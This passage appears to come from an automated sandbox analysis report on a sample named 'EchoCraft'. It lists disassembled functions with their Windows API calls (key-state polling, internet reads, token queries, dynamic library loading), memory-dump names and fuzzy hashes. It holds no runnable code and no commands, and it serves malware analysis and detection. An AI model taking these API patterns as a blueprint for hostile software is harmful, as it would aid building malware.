Instruction Fuzzy Hash: 7E5183B24083849BC724EB90DD919DBB7ECAF85310F50492EF589C3152EF75E688C76A

Function 00AE93CC Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00AE93E9
VariantClear.OLEAUT32 ref: 00AE945A
VariantClear.OLEAUT32 ref: 00AE94B9
VariantClear.OLEAUT32(?), ref: 00AE952C
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00AE9557

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 67a3a5642af508ebef14d5368868afd554c31d08a15c983332aa2e27cef741c0
Instruction ID: 259a064ac4745e36f7173a55438d0c69b5a1f1a1ff4f4fde52219ee7fe7701c0
Opcode Fuzzy Hash: 67a3a5642af508ebef14d5368868afd554c31d08a15c983332aa2e27cef741c0
Instruction Fuzzy Hash: A55147B5A00259EFCB14CF69C884AEAB7F8FF89310B158559E905EB350E730E911CBA0

Function 00AF92FC Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00AF93AF
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00AF93DB
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00AF9433
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00AF9458
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00AF9460

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 976b0d355341bb4ba694f5f46ad6300fd2eb9d5cf22b3892d3190c0f39625be5
Instruction ID: ed9a047161a3802b4e08f6b9fd6961bf64369d12efdfdc793c4816344a4efe68
Opcode Fuzzy Hash: 976b0d355341bb4ba694f5f46ad6300fd2eb9d5cf22b3892d3190c0f39625be5
Instruction Fuzzy Hash: C6513C35A002199FCB15EF54C980EA9BBF5FF48354F048098E94AAB3A2CB31ED41CF90

Function 00B09656 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00B096B2
GetProcAddress.KERNEL32(00000000,?), ref: 00B09742
GetProcAddress.KERNEL32(00000000,00000000), ref: 00B0975E
GetProcAddress.KERNEL32(00000000,?), ref: 00B097A4
FreeLibrary.KERNEL32(00000000), ref: 00B097C4

Part of subcall function 00A9F9F1: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00AF18D4,?,753CE610), ref: 00A9FA0E
Part of subcall function 00A9F9F1: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00AE0283,00000000,00000000,?,?,00AF18D4,?,753CE610,?,00AE0283), ref: 00A9FA35

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 62bbb4b79c83bd5964b3da52de36d82915f5b4483529de23915d180620823ef6
Instruction ID: b3441ab1980cd07cd1ddcbf7991fbb496e3a24394ed0906137dff56b4f621dfc
Opcode Fuzzy Hash: 62bbb4b79c83bd5964b3da52de36d82915f5b4483529de23915d180620823ef6
Instruction Fuzzy Hash: 97513B35604245DFCB11EF58C5949ADBBF0FF09324B1480A8E81AAB7A2DB31ED85CF91

Function 00B1715D Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00B1721A
SetWindowLongW.USER32(?,000000EC,?), ref: 00B17231
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00B1725A
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00AFB3AC,00000000,00000000), ref: 00B1727F
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00B172AE

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: f65b0c759a2dbdb586531ec7255e366ddf864a720ead8f50a35a4631b03cca44
Instruction ID: f5740035c57a038722113eccb515fdb479bf8d2807b3df391872a19240a8ebcc
Opcode Fuzzy Hash: f65b0c759a2dbdb586531ec7255e366ddf864a720ead8f50a35a4631b03cca44
Instruction Fuzzy Hash: 4041B235A48114BBD725DF68CC48FE57BF5EB46310F9402A4F815A72E0CE70AD91CA90

Function 00AB23E1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00AB2453
_free.LIBCMT ref: 00AB2473

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 6dc52461a51e5ed6c8b8b4f7e94f75204b367e0ea7ae9f30b906b60f3b22f653
Instruction ID: a22a402da28b139e260b7b2c8c01265700f11e678bf404ac45631be9eb1a75aa
Opcode Fuzzy Hash: 6dc52461a51e5ed6c8b8b4f7e94f75204b367e0ea7ae9f30b906b60f3b22f653
Instruction Fuzzy Hash: 8641D332A002009FDB24DF78C991B9DB7F9EF89314F1545AAE515EB396DB31AD02CB41

Function 00A81976 Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00A8198A
ScreenToClient.USER32(00000000,?), ref: 00A819A7
GetAsyncKeyState.USER32(00000001), ref: 00A819CC
GetAsyncKeyState.USER32(00000002), ref: 00A819E6

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 687dddb8a499e7deb9f2bd97fd6c85a6d95ec2d6b1834da30cfe9c5975fd3a0d
Instruction ID: 2e2906f346b2ad32655236e0b5a00b9ad6c05874f204fb2580eabea01a79c97e
Opcode Fuzzy Hash: 687dddb8a499e7deb9f2bd97fd6c85a6d95ec2d6b1834da30cfe9c5975fd3a0d
Instruction Fuzzy Hash: CF415E7190421AEFDB09EF68C844BEEB7B4FB15324F208219E466A7290CB345E91DB91

Function 00AF418B Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00AF41E2
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00AF4239
TranslateMessage.USER32(?), ref: 00AF4262
DispatchMessageW.USER32(?), ref: 00AF426C
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AF427D

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 3d09c71ede591bd030ff4e62cddaf2fbbcac83e2ef463eaec911a5b4fb8a10eb
Instruction ID: c441768615335c29cc7d20069594babf1f49881dd4220657eb85e8ec2a2dcab8
Opcode Fuzzy Hash: 3d09c71ede591bd030ff4e62cddaf2fbbcac83e2ef463eaec911a5b4fb8a10eb
Instruction Fuzzy Hash: E831D27060534A9EEB348BF4D848BF73BA8AB1A305F140579F666C31A0EB749889D711

Function 00AE217B Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00AE218F
PostMessageW.USER32(00000001,00000201,00000001), ref: 00AE223B
Sleep.KERNEL32(00000000,?,?,?), ref: 00AE2243
PostMessageW.USER32(00000001,00000202,00000000), ref: 00AE2254
Sleep.KERNEL32(00000000,?,?,?,?), ref: 00AE225C

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 2e1076de7691c30773aa3493757704d7bbacc8da02f0473fb8b25a5da669c460
Instruction ID: 1201300a3edd8e94bb65efa434f0c9c2a5997f4d6df4ba2b632a9a60456d0471
Opcode Fuzzy Hash: 2e1076de7691c30773aa3493757704d7bbacc8da02f0473fb8b25a5da669c460
Instruction Fuzzy Hash: 8031B471900259EFDB14CFA8CD89BDE3BB9FB54315F104229FA25A72D0C7709954DB90

Function 00AFD748 Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00AFCA51,00000000), ref: 00AFD766
InternetReadFile.WININET(?,00000000,?,?), ref: 00AFD79D
GetLastError.KERNEL32(?,00000000,?,?,?,00AFCA51,00000000), ref: 00AFD7E2
SetEvent.KERNEL32(?,?,00000000,?,?,?,00AFCA51,00000000), ref: 00AFD7F6
SetEvent.KERNEL32(?,?,00000000,?,?,?,00AFCA51,00000000), ref: 00AFD820

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 37425a2451eeb12f3a14910774965612d8d839c4d439eb1ba1a43733ae66727a
Instruction ID: 5d79e2ab956ae933f5850a4a3e6033b3ac0602234fcae06306211460ff4e04df
Opcode Fuzzy Hash: 37425a2451eeb12f3a14910774965612d8d839c4d439eb1ba1a43733ae66727a
Instruction Fuzzy Hash: 7A312A71900209AFDB21EFA5D884ABFBBF9EB05355B10842EF646D7140DB30AE419BA0

Function 00B01176 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00B01197
GetForegroundWindow.USER32 ref: 00B011AE
GetDC.USER32(00000000), ref: 00B011EA
GetPixel.GDI32(00000000,?,00000003), ref: 00B011F6
ReleaseDC.USER32(00000000,00000003), ref: 00B0122E

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 3595a25bfee3c306b847a6fb0f0d52be0e46761ebf6f88eb29565d7a568fee80
Instruction ID: abcbaa3fb4184056e6ba6382001dd49b3211207c93b3fffbea92c213d93a6858
Opcode Fuzzy Hash: 3595a25bfee3c306b847a6fb0f0d52be0e46761ebf6f88eb29565d7a568fee80
Instruction Fuzzy Hash: F7215135A00214AFD718EFA5C984AAEBBF5EF48350B44C469F54AE7761DB30AD44CB90

Function 00ABD1DD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00ABD1E6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ABD209

Part of subcall function 00AB3C40: RtlAllocateHeap.NTDLL(00000000,?,?,?,00AA0215,?,?,00AF1070,0000FFFF), ref: 00AB3C72

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00ABD22F
_free.LIBCMT ref: 00ABD242
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00ABD251

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: f9f13a64487d2db380688d090232fbc6cdf2696929fcee35b374fe826ca92a22
Instruction ID: a1ea7895fcd822cd3b9fb6a8c5105e042ad809d7c2e2304f6c2833018a9e9ae5
Opcode Fuzzy Hash: f9f13a64487d2db380688d090232fbc6cdf2696929fcee35b374fe826ca92a22
Instruction Fuzzy Hash: EC0184726026957F372127BA6C88DFB6E6DEEC6B613144129FD04D7202EE70CC0195B5

Function 00AB3218 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00AB2C3D,00AB3C83,?,?,00AA0215,?,?,00AF1070,0000FFFF), ref: 00AB321D
_free.LIBCMT ref: 00AB3252
_free.LIBCMT ref: 00AB3279
SetLastError.KERNEL32(00000000), ref: 00AB3286
SetLastError.KERNEL32(00000000), ref: 00AB328F

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 1849b39d20d1b4d7223da4fc7f1158d9c4faccff0f823d2b952c39dd4a6ca2d6
Instruction ID: 74d2ad7ed82d8dfded8c3f1bd78e62f7291ef3ca3c9a988b72bb3eb16bab5292
Opcode Fuzzy Hash: 1849b39d20d1b4d7223da4fc7f1158d9c4faccff0f823d2b952c39dd4a6ca2d6
Instruction Fuzzy Hash: 1401F4372416003B9E1237396D4AEEB2B6DAFE1360B214529FD26A3293EF708F014121

Function 00AE082D Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AE0760,80070057,?,?,?,00AE0B7D), ref: 00AE084A
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AE0760,80070057,?,?), ref: 00AE0865
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AE0760,80070057,?,?), ref: 00AE0873
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AE0760,80070057,?), ref: 00AE0883
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AE0760,80070057,?,?), ref: 00AE088F

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 3add34907de54e224f043126a0381ec382f8bfeaf42e1b7c613fc18bea47d602
Instruction ID: 74e306d4f27f83a480c3469f196c2156e729716c966fc6ef34f50354c1193503
Opcode Fuzzy Hash: 3add34907de54e224f043126a0381ec382f8bfeaf42e1b7c613fc18bea47d602
Instruction Fuzzy Hash: 47017C72600214ABDB115F59DC44FAA7AADEB84791F544024F949D7210DBB0DD809BA0

Function 00AEF152 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 00AEF16E
QueryPerformanceFrequency.KERNEL32(?), ref: 00AEF17C
Sleep.KERNEL32(00000000), ref: 00AEF184
QueryPerformanceCounter.KERNEL32(?), ref: 00AEF18E
Sleep.KERNEL32 ref: 00AEF1CA

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: cc53bad3c7634732259387493e3e7fff6411af5521e6a2ed4142bbff3ce852e8
Instruction ID: d51a08d49ea28c8704fab225a0ff02416c6dde039623d2917d82259bf51ef8c3
Opcode Fuzzy Hash: cc53bad3c7634732259387493e3e7fff6411af5521e6a2ed4142bbff3ce852e8
Instruction Fuzzy Hash: C5011731C0166DEBCF04AFA6D948AEDBB79FB08701F414566EA01B2154DF30969487A1

Function 00AE1973 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AE198E
GetLastError.KERNEL32(?,00000000,00000000,?,?,00AE1415,?,?,?), ref: 00AE199A
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00AE1415,?,?,?), ref: 00AE19A9
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00AE1415,?,?,?), ref: 00AE19B0
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AE19C7

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 6700c729116b387f0e0d4a2cead1a992273e2b38d2dcbc3e642260f18613d245
Instruction ID: a9a337a10ecee3cb0aa8243c473f90c0e5ed68673f4ef4e58143ab45bc8a903d
Opcode Fuzzy Hash: 6700c729116b387f0e0d4a2cead1a992273e2b38d2dcbc3e642260f18613d245
Instruction Fuzzy Hash: F6018CB5200225BFDB124FA5DC58EAA3BAEEF883A0B614424F945D3260DE31DC408A60

Function 00AE188E Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AE18A4
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AE18B0
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AE18BF
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AE18C6
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AE18DC

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 2444f6cea3f1147762ee33be3ea2e3c90f49e9f6b2880969f1402dc61db85d1d
Instruction ID: 42ff6721bd59553d86403ebb7453cd59d6e29c630105d52c30c7386339923cf9
Opcode Fuzzy Hash: 2444f6cea3f1147762ee33be3ea2e3c90f49e9f6b2880969f1402dc61db85d1d
Instruction Fuzzy Hash: A7F06D75200311BBDB110FA5EC5DF963BAEEF89760F514425FA49D72A0DE70D9108A60

Function 00AE182E Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AE1844
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AE1850
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AE185F
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AE1866
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AE187C

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
